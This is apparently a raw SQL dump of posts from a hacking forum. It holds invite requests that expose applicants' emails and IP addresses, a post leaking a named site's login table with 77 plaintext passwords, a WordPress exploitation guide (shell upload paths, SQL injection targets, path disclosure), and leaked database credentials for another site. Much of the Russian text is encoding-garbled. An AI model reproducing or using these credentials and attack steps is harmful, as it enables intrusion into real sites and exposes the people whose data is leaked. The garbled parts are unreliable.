\n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1583, 1434, 0, 'Invite', 2, '{$name}', 1407942586, '[SIZE=\'4\'][COLOR=\'Sienna\']hazret-i fahişe[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: kutsalcoder@gmail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 212.156.71.6\n[*][b]real ip[/b]: 212.156.71.6\n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://dinikaynak.blogspot.com/.../abdesti-bozan-seyler.html | http://dinikaynak.blogspot.com/.../abdesti-bozan-seyler.html \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1584, 1435, 0, 'Invite', 2, '{$name}', 1407945340, '[SIZE=\'4\'][COLOR=\'Sienna\']qsder[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: \n[b]e-mail[/b]: lucas.toriello@laposte.net\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 92.130.236.22\n[*][b]real ip[/b]: 92.130.236.22\n[*][b]User agent[/b]: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/537.75.14\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://qsder.deviantart.com | qsder.deviantart.com \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1585, 1436, 0, 'w0rm', 1, 'äþруü ÑÂúÑÂÿþртð ò market', 1407945629, 'Ãâ€Ã¾ÑÂтуÿõý тþûьúþ учðÑÂтýøúðü úþüðýôы, òÑÂõ ôðýýыõ ÑÂúûðôыòðõü ò ÑÂþþтòõтÑÂтòующøõ рð÷ôõûы - ò ÿþÑÂûõôÑÂтòøø ÿõрõýõÑÂу ò üðóð÷øý.\r\nâðú-öõ òыÑÂтðòûõýýы ÿрðòð òÑÂõü ÿþûь÷þòðтõÃȄÂü ò ÑÂþþтòõтÑÂтòøõ ѠðúтøòýþÑÂтью.\r\n[url]http://w0rm.in:8888/forumdisplay.php?f=19[/url]', 1, 0, '', 0, 1, 0, 0, 0), (1588, 1439, 0, 'Invite', 2, '{$name}', 1408103209, '[SIZE=\'4\'][COLOR=\'Sienna\']petrov[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: petrov11@jabber.kz\n[b]e-mail[/b]: petrov11@mail.kz\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 91.229.77.92\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: https://twitter.com/Udraletsontour | https://twitter.com/Udraletsontour \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1590, 1440, 0, 'Invite', 2, '{$name}', 1408104232, '[SIZE=\'4\'][COLOR=\'Sienna\']Jsmitty[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: jsmitty@reallymymail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 31.54.123.101\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1591, 1441, 0, 'Invite', 2, '{$name}', 1408104238, '[SIZE=\'4\'][COLOR=\'Sienna\']Jsmitty[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: jsmitty@reallymymail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 31.54.123.101\n[*][b]real ip[/b]: 31.54.123.101\n[*][b]User agent[/b]: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1592, 1018, 1021, '123', 41, '', 1408104457, 'ýõ ÑÂтðû ñы ѠôþòõрÑÂть тðúþüу рутúøту, þý ôрõòýøù úðú ýõ ÷ýðю чтþ )', 1, 0, '', 0, 1, 0, 0, 0), (1593, 1442, 0, 'Invite', 2, '{$name}', 1408104764, '[SIZE=\'4\'][COLOR=\'Sienna\']DatApple[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: conslight@jabbim.cz\n[b]e-mail[/b]: conslight2@gmail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 5.50.236.60\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1597, 1083, 1508, 'BigBear', 34, '', 1408110867, '[quote=kx00;1508][url]http://www.caribbeancom.com/[/url]\r\n\r\n[html]database: Movie\r\n[10 tables]\r\n+----------+\r\n| category |\r\n| coupon |\r\n| group |\r\n| login |\r\n| movie |\r\n| orders |\r\n| parts |\r\n| ranking |\r\n| rating |\r\n| series |\r\n+----------+[/html]\r\n[html]table: Login\r\n[77 entries]\r\n+----------------------+---------+--------------+-----------------+\r\n| user_id | site_id | password | user_name |\r\n+----------------------+---------+--------------+-----------------+\r\n| tmasami | 1700 | lkjsdf3af3a | tmasami |\r\n| studio9014 | 9014 | lp8jkb6a | h&h |\r\n| webmaster1100 | 1100 | diwoa4wa | webmaster1100 |\r\n| masako | 1700 | mbarrow | masako barrow |\r\n| hitomi | 1700 | i86yulma+ | hitomi |\r\n| momoko | 1700 | mnm58bbs] | momoko |\r\n| wuehara | 1700 | zwm52fm2bsof | wuehara |\r\n| webmaster1900 | 1900 | gei8oavc | webmaster1900 |\r\n| mizuho | 1700 | lbsb>9rq8 | mizuho |\r\n| kengo | 1700 | test1234 | kengo tateda |\r\n| syamamoto | 1700 | lpm8nyr5 | syamamoto |\r\n| hiro | 1700 | hzusho | hiro zusho |\r\n| mariko | 1700 | megami | mariko egami |\r\n| nancy | 1700 | nim | nancy im |\r\n| daniel | 1700 | dlemos | daniel lemos |\r\n| kazunori | 1700 | lkgm1dsu | kazunori koga |\r\n| sales1700 | 1700 | f1ha8k7a | sales1700 |\r\n| guest1700 | 1700 | asidf5de | guest1700 |\r\n| manager1700 | 1700 | re35desp | manager1700 |\r\n| webmaster1700 | 1700 | ot8b3cua | webmaster1700 |\r\n| webmaster1200 | 1200 | mrkiap41 | webmaster1200 |\r\n| webmaster1300 | 1300 | iu8aplev | webmaster1300 |\r\n| webmaster1400 | 1400 | forpw3gh | webmaster1400 |\r\n| webmaster2300 | 2300 | 52e8irp6 | webmaster2300 |\r\n| webmaster1600 | 1600 | dpe16vew | webmaster1600 |\r\n| webmaster1800 | 1800 | wosp2bfr | webmaster1800 |\r\n| webmaster2001 | 2001 | s2xy6me | webmaster2001 |\r\n| studio1500 | 1500 | r5rx8zmu | avbox |\r\n| webmaster2200 | 2200 | twc2rexy | webmaster2200 |\r\n| studio1600 | 1600 | bwhsvhv7 | dreamroom |\r\n| studio2000 | 2000 | gsfoqq1w | スカイãƒÂイ |\r\n| studio2100 | 2100 | kygxz5qc | s2 エンターテイメント |\r\n| studio9001 | 9001 | snge1lrn | mugen エンターテイメント |\r\n| studio9002 | 9002 | 5q9i7leh | kokeshi |\r\n| miwa | 1700 | 3939 | miwa |\r\n| d2p | 1700 | mhxv3kkn | d2p |\r\n| akipikka | 1700 | lovemiyomiyo | akiko yamamoto |\r\n| dti | 1700 | f1ha8k7a | staff |\r\n| studio9003 | 9003 | x0tols81 | v & r |\r\n| studio9004 | 9004 | qu857aqo | teriyaki |\r\n| guest1100 | 1100 | ngm885wj | guest1100 |\r\n| guest1300 | 1300 | 1wezy1r7 | guest1300 |\r\n| guest1400 | 1400 | t43yhbc8 | guest1400 |\r\n| guest1800 | 1800 | 964vekpm | guest1800 |\r\n| guest2200 | 2200 | a9w7ku22 | guest2200 |\r\n| guest1900 | 1900 | qwsf96s7 | guest1900 |\r\n| studio9005 | 9005 | a3tafe29 | progre |\r\n| enokida | 1700 | e32cy74 | s enokida |\r\n| studio9010 | 9010 | akh9jn71 | スタジオ舞妓 |\r\n| studio9011 | 9011 | ak8s7jwe | teriyaki2 |\r\n| blog1700 | 1700 | anbksu8ah | blog1700 |\r\n| studio_prog_1600 | 1600 | ua8aj2jab4k | prog |\r\n| studio9102 | 9102 | kal9uryqbs | b-dash |\r\n| studio_skyhighx_2000 | 2000 | lakfs8dfh2l3 | スカイãƒÂイx |\r\n| studio9013 | 9013 | avwp3cse | hotcream |\r\n| studio9012 | 9012 | alkjsdf823b | stage2media |\r\n| studio_prog2_1600 | 1600 | lkjs983a4bd | prog2 |\r\n| cjun | 1700 | b1feaxucu16y | cjun |\r\n| studio_prog3_1600 | 1600 | 8hjk2fgwpu | prog3 |\r\n| dlsystems | 1100 | kjsd92kasdf | dl systems |\r\n| webmaster2400 | 2400 | jksd8nhj2 | webmaster2400 |\r\n| ahiguchi | 1700 | ake88aisbin2 | ahiguchi |\r\n| ysakakibara | 1700 | xk982jbadf | ysakakibara |\r\n| studio_master | 1100 | le8h3pesm | studio_master |\r\n| webmaster1100en | 1100 | okei3ush4 | webmaster1100en |\r\n| studio9015 | 9015 | 9kjeuhg5 | ティティ (グレイズ) |\r\n| studio9016 | 9016 | 7e3lgrdg8 | ティティ(tma) |\r\n| studio9017 | 9017 | nmajr8kl | merci beaucoup |\r\n| weslee1100 | 1100 | laki8hjmc | weslee1100 |\r\n| marchin1100 | 1100 | o19jf48c | marchin1100 |\r\n| studio9018 | 9018 | l7dtk3qp | climax zipang |\r\n| studio9019 | 9019 | yel7t4ks | ティティ(abc) |\r\n| studio9020 | 9020 | datpq3r9 | pink champagne |\r\n| sshimizu | 1700 | hdky5jqzvp | sshimizu |\r\n| studio9021 | 9021 | da4el3pq | studio mfk |\r\n| studio9022 | 9022 | hltee9a1p | murakami(ムラカミ) |\r\n| mmusashi | 1700 | kl89s2afv3 | mmusashi |\r\n+----------------------+---------+--------------+-----------------+[/html]\r\n\r\nтðú, ÑÂтø ÷òõрø ðôüøýþòÑÂúøõ. ðôüøýúу ýõ ýðшõû. õÑÂть /webmasters/ ýþ ÿþчõüу тþ ÿõрõýðÿрðòÃȄÂõт ýð index, òþ÷üþöýþ ôõûþ ò ip.\r\n \r\nю÷õры ðòтþрø÷уютÑÂѠчõрõ÷ d2pass. òðрøðýт, ýуöõý шõûû ýð b.caribbeancom.com тðü ðòтþрø÷ðцøѠчõрõ÷ api øôõт.[/quote]\r\n\r\nÿрøòõт. ôð, ÑÂтø тðñûøцы òøôõû. ÿþхþôу ю÷òõрø ûõöðт øüõýýþ ò d2pass.\r\n\r\nð ûþüðть тðúую ÑÂøÑÂтõüу - уöõ þтôõûьýыù рð÷óþòþр.', 1, 0, '', 0, 1, 0, 0, 0), (1598, 1443, 0, 'BigBear', 34, 'ÿþ ушø... ò wp', 1408111427, 'ßõрòðѠчðÑÂть ÑÂтðтьø ѠÿþôрþñýþÑÂÑ‚ÑÂüø\n\n[SIZE=3][COLOR=Red][B]WordPress 1.0 < 1.5[/B][/COLOR][/SIZE]\n\n[COLOR=Blue][B]Úðú øôõýтøфøцøрþòðть (2 ÑÂÿþÑÂþñð):[/B][/COLOR]\n\n[B]áÿþÑÂþñ â„–1[/B] - çøтðõü ./readme.html\n[code]Version 1.0.2[/code]\n[B]áÿþÑÂþñ â„–2[/B] - þÑÂþñõýýþÑÂтø ðòтþрø÷ðцøø ðôüøýð.\n\nÒõрÑÂøю 1.Ñ… (ôþ 1.5 ýõ òúûючøтõûьýþ) üþöýþ øôõýтøфøцøрþòðть Ѡñþûьшþù ôþûõù òõрþÑÂтýþÑÂтø ÿþ ýðûøчøю ÑÂтрþúø [code]\";\n $blogrolling = false;\n $opml_url = $uploadfile;\n } else {\n echo \"Upload error

\";\n }\n }[/code]\nÚðú ýõ ÑÂûþöýþ ÷ðüõтøть - ýøúðúøх ÿрþòõрþú ýð úþýтõýт/рðÑÂшøрõýøõ фðùûð ýõ ÿрþøÑÂхþôøт.\n\nèõûû ñуôõт ò ôøрõúтþрøø, уúð÷ðýýþù ò ýðÑÂтрþùúðх [code] ./wp-admin/options.php?option_group_id=4 [/code]\nßþ уüþûчðýøю ÑÂтþ ÿðÿúð [B]/images[/B]\n\nî÷ðõü шõûû [code] ./images/shell.php[/code]\n[COLOR=Blue][B]ßрø SQL øýъõúцøø:[/B][/COLOR]\n[code][B]Table[/B] = wp_users\n[B]Columns[/B] = user_login, user_pass, user_level=10\n\n[B]ÃÂûóþрøтü Ñ…ÑÂшøрþòðýøÑÂ[/B] = plain-text\n[/code]\n[COLOR=Blue][B]à ðÑÂúрытøõ ÿутõù ôûѠýõðòтþрø÷þòðýýых ÿþûь÷þòðтõûõù:[/B][/COLOR]\n[code]./wp-admin/admin-footer.php\n./wp-admin/edit-form-advanced.php\n./wp-admin/edit-form-comment.php\n./wp-admin/edit-form.php\n./wp-includes/functions.php\n./wp-includes/kses.php\n./wp-includes/vars.php\n./wp-settings.php\n./xmlrpc.php\n[/code]\n[code]Fatal error: Call to undefined function timer_stop() in X:\\home\\wp1\\wp-admin\\admin-footer.php on line 5[/code]\nÃ’ ÑÂтþù òõрÑÂøø WordPress, ò õôøýÑÂтòõýýþù ø÷þ òÑÂõх õÑÂть ôþÑÂтуÿýыù ôûѠòÑÂõх [B]PHPINFO()[/B].\n\n[code]./phpinfo.php[/code]\n[SIZE=3][COLOR=Red][B]WordPress 1.5 < 2.0[/B][/COLOR][/SIZE]\n\n[COLOR=Blue][B]Úðú øôõýтøфøцøрþòðть (2 ÑÂÿþÑÂþñð):[/B][/COLOR]\n\n[B]áÿþÑÂþñ â„–1[/B] - çøтðõü ./readme.html\n[code]Version 1.5.1[/code]\n[B]áÿþÑÂþñ â„–2[/B] - þÑÂþñõýýþÑÂтø ðòтþрø÷ðцøø ðôüøýð.\n\nÒõрÑÂøø 1.5 < 2.0 хðрðúтõрø÷уõт þтÑÂутÑÂтòøõ чõúñþúÑÂð ýð ÑÂтрðýøцõ ðòтþрø÷ðцøø ./wp-login.php.\n\nàтðúöõ þтÑÂутÑÂтòøõ úþýтрþûьýþù ÑÂтрþúø [code]=2.0 хðрðúтõрø÷уютÑÂѠтþûьúþ þтÑÂутÑÂòøõü ÿрø÷ýðúþò, хðрðúтõрýых ôûѠñþûõõ рðýýøх òõрÑÂøù.\n\nàøüõýýþ:\n\n1) ÞтÑÂутÑÂтòøõü úþýтрþûьýþù ÑÂтрþúø ò фðùûõ ./wp-login.php [code]unix_timestamp(date(now()))\'> temp/jos_usermoney.sql\n[/code]\nø õщõ \n[code]\n\n\n\n\n$host=\"overpro.ru\";\n$port=3306;\n$socket=\"\";\n$user=\"YoriK\";\n$password=\"hfplfk,fq\";\n$dbname=\"wwwoverproru\";\n[/code]', 1, 0, '', 0, 1, 0, 0, 0), (1612, 1447, 0, 'Invite', 2, '{$name}', 1408138840, '[SIZE=\'4\'][COLOR=\'Sienna\']Nickname[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: Email@mail.ru\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 158.255.211.156\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1613, 1448, 0, 'Invite', 2, '{$name}', 1408139008, '[SIZE=\'4\'][COLOR=\'Sienna\']Nickname[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: Email@kakak.ru\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 158.255.211.156\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1614, 1449, 0, 'w0rm', 1, 'market FAQ', 1408140922, 'coming soon', 1, 0, '', 0, 1, 0, 0, 0), (1616, 1451, 0, 'Invite', 2, '{$name}', 1408191188, '[SIZE=\'4\'][COLOR=\'Sienna\']snowden[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: e.snowden@jmail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 158.255.211.156\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://snowden.info | snowden.info \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1617, 1452, 0, 'Invite', 2, '{$name}', 1408191875, '[SIZE=\'4\'][COLOR=\'Sienna\']Bl4k3_[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: null;null;\n[b]e-mail[/b]: bl4ke1@hotmail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 93.43.5.192\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://www.meetme.com/member/4875609 | http://www.meetme.com/member/4875609 \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1619, 1453, 0, 'Invite', 2, '{$name}', 1408192615, '[SIZE=\'4\'][COLOR=\'Sienna\']Krolle[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: \n[b]e-mail[/b]: preaker@gmail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 87.55.7.8\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : 